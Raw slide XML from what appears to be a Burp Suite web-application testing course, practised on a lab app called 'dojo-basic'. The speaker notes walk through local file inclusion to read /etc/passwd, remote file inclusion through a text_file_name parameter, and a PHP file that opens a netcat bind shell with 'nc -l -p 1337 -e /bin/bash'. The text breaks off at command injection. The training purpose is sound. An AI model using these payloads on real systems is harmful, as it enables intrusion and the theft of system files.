        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4970399" y="1459606"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F23CEF6E-F172-4847-A088-551C30395A5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="8100000">
          <a:off x="4601226" y="2316853"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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4683638" y="2364089"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C04C3E1-4B42-8A49-863D-AF38B68542E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3512046" y="2564875"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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Automated &amp; Manual Fuzzing/Scanning</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3688588" y="2741417"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CCCBDBDA-7692-8D4A-A4A8-731109EC5912}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="13500000">
          <a:off x="3319414" y="2329735"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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3401826" y="2445243"/>
        <a:ext cx="225289" cy="244114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{79AFA3FB-0D00-FC4F-8759-DE72FEC7CA6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2230234" y="1283064"/>
          <a:ext cx="1205507" cy="1205507"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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Exploiting Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2406776" y="1459606"/>
        <a:ext cx="852423" cy="852423"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A9C0795B-8145-9241-8DF2-C2A2F5E9F7A4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18900000">
          <a:off x="3306532" y="1047923"/>
          <a:ext cx="321841" cy="406858"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:shade val="85000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:tint val="60000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
                <a:tint val="90000"/>
                <a:alpha val="100000"/>
                <a:satMod val="200000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
          </a:path>
        </a:gradFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="42924"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320672" y="1163431"/>
        <a:ext cx="225289" cy="24411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EA7955-B8BF-F54D-B052-27F59B5367D3}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19</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1DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28674214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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2392553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Essentially the site map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tree map or sort by request method, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, response size, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0"/>
              <a:t>View individual request/response details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pro version also gives issue descriptions and links to OWSAP vulnerability lists.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129939434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Testing for Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> File Inclusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In a browser modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> from: dojo-basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to dojo-basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>index.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>paswd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As the contents of the file are output, the site is open to LFI.</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7614695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The same request that was made in the browser can also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> be made in Burp. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Send any request that has a page= parameter to the Repeater tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Modify the path to include page=../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The list of users on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> system are dumped in the response.</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35253799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Testing for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Remote File Inclusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Navigate to the Reading Room page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Select any document from the drop down and then click on submit.</a:t>
            </a:r>
          </a:p>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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29486765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In Burp find the request that was just made in the Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> HTTP History tab, and then send that request to the Repeater tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Press Go to validate the original request still works.</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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39677607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In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a terminal add as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> user: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>id.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>id.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Inside the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> file add:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>(‘id’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Save the file.</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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9841281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Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in the Repeater request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=http%3A%2F%2F127.0.0.1%2Fid.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>When the response comes back, we can see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is returned.</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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27224234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Test RFI on a remote file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modify the Repeater request again, on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to point to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>google</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text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=https%3A%2F%2Fwww.google.com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When the response comes back, we can see that we loaded the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> web page.</a:t>
            </a:r>
          </a:p>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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246714398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View the Google page request in the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375203640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In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a terminal add as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> user: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>shellme.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Inside the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> file add:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>	echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> -l -p 1337 -e /bin/bash’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Save the file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10404856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Point</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>shellme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> file already created on the server. Once the Go button is pressed nothing will happen.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text_file_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>=http%3A%2F%2F127.0.0.1%2Fshellme.php</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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2003348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The Pro version adds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the Issues and Advisory windows. These are also found in the Scanner Tab, and all rules are found in the Scanner Tab as well.</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279919855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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5070699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Testing for Command Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to the DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Lookup page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Enter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>google.com</a:t>
